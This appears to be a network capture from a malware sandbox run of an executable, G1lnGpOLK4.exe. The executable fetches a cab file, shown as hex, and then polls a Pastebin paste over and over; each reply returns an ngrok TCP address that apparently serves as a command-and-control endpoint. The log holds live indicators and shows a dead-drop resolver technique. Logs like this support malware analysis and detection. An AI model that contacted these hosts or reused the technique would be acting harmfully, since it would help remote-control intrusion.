2024-05-02 04:01:54 UTC	560	IN	HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: application/octet-stream Expires: -1 Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160" MS-CorrelationId: 73bf6ee7-ab25-4608-ba53-36e080279018 MS-RequestId: eeacbd15-c828-4aa1-a23d-e8c46a0d0cd5 MS-CV: g05sRMwMH0a6XnE5.0 X-Microsoft-SLSClientCache: 2160 Content-Disposition: attachment; filename=environment.cab X-Content-Type-Options: nosniff Date: Thu, 02 May 2024 04:01:53 GMT Connection: close Content-Length: 25457
2024-05-02 04:01:54 UTC	15824	IN	Data Raw: 4d 53 43 46 00 00 00 00 51 22 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 db 8e 00 00 14 00 00 00 00 00 10 00 51 22 00 00 20 41 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 f3 43 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 0d 92 6f db e5 21 f3 43 43 4b ed 5a 09 38 55 5b df 3f 93 99 90 29 99 e7 29 ec 73 cc 4a 66 32 cf 84 32 64 c8 31 c7 11 52 38 87 90 42 66 09 99 87 32 0f 19 0a 09 51 a6 a8 08 29 53 86 4a 52 84 50 df 46 83 ba dd 7b df fb 7e ef 7d ee 7d bf ef 9e e7 d9 67 ef 35 ee b5 fe eb 3f ff b6 96 81 a2 0a 04 fc 31 40 21 5b 3f a5 ed 1b 04 0e 85 42 a0 10 04 64 12 6c a5 de aa a1 d8 ea f3 58 01 f2 f5 67 0b 5e 9b bd e8 a0 90 1d bf 40 88 9d eb 49 b4 87 9b ab 8b 9d 2b 46 c8 c7 c5 19 92 Data Ascii: MSCFQ"DQ" AdCenvironment.cabo!CCKZ8U[?))sJf22d1R8Bf2Q)SJRPF{~}}g5?1@![?BdlXg^@I+F
2024-05-02 04:01:54 UTC	9633	IN	Data Raw: 21 6f b3 eb a6 cc f5 31 be cf 05 e2 a9 fe fa 57 6d 19 30 b3 c2 c5 66 c9 6a df f5 e7 f0 78 bd c7 a8 9e 25 e3 f9 bc ed 6b 54 57 08 2b 51 82 44 12 fb b9 53 8c cc f4 60 12 8a 76 cc 40 40 41 9b dc 5c 17 ff 5c f9 5e 17 35 98 24 56 4b 74 ef 42 10 c8 af bf 7f c6 7f f2 37 7d 5a 3f 1c f2 99 79 4a 91 52 00 af 38 0f 17 f5 2f 79 81 65 d9 a9 b5 6b e4 c7 ce f6 ca 7a 00 6f 4b 30 44 24 22 3c cf ed 03 a5 96 8f 59 29 bc b6 fd 04 e1 70 9f 32 4a 27 fd 55 af 2f fe b6 e5 8e 33 bb 62 5f 9a db 57 40 e9 f1 ce 99 66 90 8c ff 6a 62 7f dd c5 4a 0b 91 26 e2 39 ec 19 4a 71 63 9d 7b 21 6d c3 9c a3 a2 3c fa 7f 7d 96 6a 90 78 a6 6d d2 e1 9c f9 1d fc 38 d8 94 f4 c6 a5 0a 96 86 a4 bd 9e 1a ae 04 42 83 b8 b5 80 9b 22 38 20 b5 25 e5 64 ec f7 f4 bf 7e 63 59 25 0f 7a 2e 39 57 76 a2 71 aa 06 8a Data Ascii: !o1Wm0fjx%kTW+QDS`v@@A\\^5$VKtB7}Z?yJR8/yekzoK0D$"<Y)p2J'U/3b_W@fjbJ&9Jqc{!m<}jxm8B"8 %d~cY%z.9Wvq

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49770	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:01:59 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:01:59 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:01:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 52 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51cfba848727a-EWR
2024-05-02 04:01:59 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:01:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49774	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:04 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:04 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:04 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 57 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51d1cea480f80-EWR
2024-05-02 04:02:04 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49776	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:11 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:11 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:11 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 64 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51d461d510f37-EWR
2024-05-02 04:02:11 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49778	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:16 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:16 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:16 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 69 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51d67bc4343ff-EWR
2024-05-02 04:02:16 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49780	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:22 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:02:22 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:22 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 75 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51d88dca7429e-EWR
2024-05-02 04:02:22 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:22 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.4	49782	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:27 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:27 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:27 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 80 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51da9d8cb80e2-EWR
2024-05-02 04:02:27 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49785	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:32 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:02:32 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:32 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 85 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51dcaf9d21869-EWR
2024-05-02 04:02:32 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:32 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49787	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:38 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:38 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:38 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 91 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51deebd554396-EWR
2024-05-02 04:02:38 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:38 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49789	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:43 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:43 UTC	396	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:43 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 96 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51e102e25729e-EWR
2024-05-02 04:02:43 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49791	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:49 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:49 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:49 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 102 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51e320d7d0f3f-EWR
2024-05-02 04:02:49 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:49 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49793	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:54 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:54 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:54 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 107 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51e5378a642bd-EWR
2024-05-02 04:02:54 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49795	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:02:59 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:02:59 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:02:59 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 112 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51e7439d38c69-EWR
2024-05-02 04:02:59 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:02:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49797	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:04 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:04 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:04 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 117 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51e92694ac466-EWR
2024-05-02 04:03:04 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:04 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49799	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:09 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:09 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:09 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 122 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51eb2ccafc32a-EWR
2024-05-02 04:03:09 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:09 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49801	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:14 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:03:15 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:15 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 128 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51ed34a7317b1-EWR
2024-05-02 04:03:15 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49803	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:19 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:19 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:19 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 132 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51ef06837438d-EWR
2024-05-02 04:03:19 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:19 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49805	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:24 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:03:24 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:24 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 137 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f0c3d454216-EWR
2024-05-02 04:03:24 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:24 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49807	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:28 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:28 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:28 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 141 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f298bfb8c06-EWR
2024-05-02 04:03:28 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:28 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49809	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:32 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:33 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:33 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 146 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f4448fd437b-EWR
2024-05-02 04:03:33 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:33 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49811	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:37 UTC	74	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-05-02 04:03:37 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:37 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 150 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f5ebec3c335-EWR
2024-05-02 04:03:37 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49813	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:42 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:03:43 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:42 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 155 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f81aa9f0f8b-EWR
2024-05-02 04:03:43 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:43 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49815	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:46 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:03:47 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:47 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 160 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51f9b6b908cc6-EWR
2024-05-02 04:03:47 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:47 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49817	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-02 04:03:50 UTC	50	OUT	GET /raw/s4TipmJt HTTP/1.1 Host: pastebin.com
2024-05-02 04:03:51 UTC	397	IN	HTTP/1.1 200 OK Date: Thu, 02 May 2024 04:03:51 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 164 Last-Modified: Thu, 02 May 2024 04:01:07 GMT Server: cloudflare CF-RAY: 87d51fb4a9e39e16-EWR
2024-05-02 04:03:51 UTC	29	IN	Data Raw: 31 37 0d 0a 30 2e 74 63 70 2e 65 75 2e 6e 67 72 6f 6b 2e 69 6f 3a 31 35 31 35 35 0d 0a Data Ascii: 170.tcp.eu.ngrok.io:15155
2024-05-02 04:03:51 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.4	49819	104.20.3.235	443	2472	C:\Users\user\Desktop\G1lnGpOLK4.exe

